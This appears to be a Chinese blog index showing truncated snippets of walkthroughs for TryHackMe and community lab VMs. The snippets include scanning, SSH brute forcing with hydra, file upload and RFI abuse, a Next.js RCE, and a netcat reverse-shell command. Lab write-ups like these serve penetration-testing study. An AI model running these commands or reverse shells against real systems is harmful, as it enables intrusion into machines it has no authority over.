TryHackMe之PreSecurity
1234本来想来打打tryhackme的靶机,结果被hackpath种草了只收录打tryhackme的部分答案,不涉及知识,tryhackme的知识体系确实很全面友好平台:https://tryhackme.com/视频:https://www.youtube.com/@The_Helpful_Hacker Pre SecurityIntroduction to Cyber SecurityOffensive Security Intro123Which of the following options better represents the process where you simulate a hacker's actions to find vulnerabilities in a system?Offensive Security 12gobuster -u http://fakebank.thm -w wordlist.txt dir-u 用于指定我们要扫描的网站, -w 用来遍历一组单词以查找隐藏的页面。 1根据情景输入即可 Defensi...
群友靶机之7r1umph
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:12345678910111213靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口 目录扫描 1index.php有一个上传口,/upload和/tmp是可访问文件目录口,/info.php是php的phpinfo,抓包走一遍文件上传逻辑 1文件上传的时候没啥限制,发现上传之后会在upload上但是后缀名加成.dsz,也会出现在/tmp上但是再点击的时候,就显示404,该文件也消失掉了,那思路应该就...
群友靶机之5ud0
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180端口和22端口,80端口是一个Textpattern CMS,过去看看 80端口探测12345访问一下显示无法访问,发现跳转到了textpattern.dsz 那就把放他到hosts当中sudo vim /etc/hosts192.168.44.153 textpattern.dsz 再次访问,可以正常访问了 nday利用1搜索一下Tex...
群友靶机之wechat
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1经典的22,80端口还提示robots.txt了个1.txt 80端口探测ctf小游戏 1进来一眼看到密码的rsa,直接一把梭就好了 1base64加rot13编码 1有一张没有显示出来的图片,base64解码,string分析获得的图片 12将三部分的解码之后可以获得登录凭证flag{welcome:wlc0mE@660930...
群友靶机之Vimer
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 122,80,113端口,113端口泄露了vim用户名,先尝试爆破ssh,再去看看80端口 80端口探测 1是一个vim,没有什么特别的东西 爆破获得用户账号密码12hydra -l vim -P /usr/share/wordlists/rockyou.txt 192.168.44.151 sshvim/000001 ssh连接1ssh vi...
群友靶机之victorique
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 域名解析12sudo vim /etc/hosts192.168.44.155 victorique.xyz 域名枚举 12sudo vim /etc/hosts192.168.44.155 victorique.xyz gifts.victorique.xyz 服务探测gifts.victorique.xyz1给了账号和密码 ookami/Go...
群友靶机之Regex
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 122,80,5000端口,80端口什么都没有,切入点应该在5000端口上了 服务探测 1进来是一个邮箱验证,目录扫描也没有什么tips点上,常规查看源码发现有一个被注释掉了的邮箱地址,看看有什么用先 1只是单纯的返回了邮箱验证正确,搜regax存在个redos攻击,那么可能验证的邮箱是用的正则匹配,可能存在redos攻击获得报错信息,刚好获得一...
群友靶机之React
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180,22,3000端口,在3000端口看到是nextjs最新的 CVE-2025-66478 rce漏洞 nday1为了方便后期实现就反弹shell到kali上面,busybox nc 192.168.44.128 4444 -e bash 123456789101112131415161718192021222324252627282930...
群友靶机之Open
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧经典的80端口加22端口,但是这里的80端口显示重定向到open.dsz,正常直接访问是访问不到的,做了个域名映射 80端口探测12sudo vim /etc/hosts192.168.44.139 open.dsz 远程文件包含12正常进来之后提示是一个远程文件包含(RFI)测试工具通过http://open@格式进行URL处理 反弹s...
群友靶机之Monkey
123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:12345678910111213靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口 80端口探索 123进来是一个html,在源代码提示了个域名,依旧放到hosts当中8sudo vim /etc/hosts192.168.44.139 open.dsz 目录扫描 1这里出题人对dirsearch进行了限制,扫不出东西,换成gobuster来试试 tip点切入1234出了两个文件,其实bak.zip...
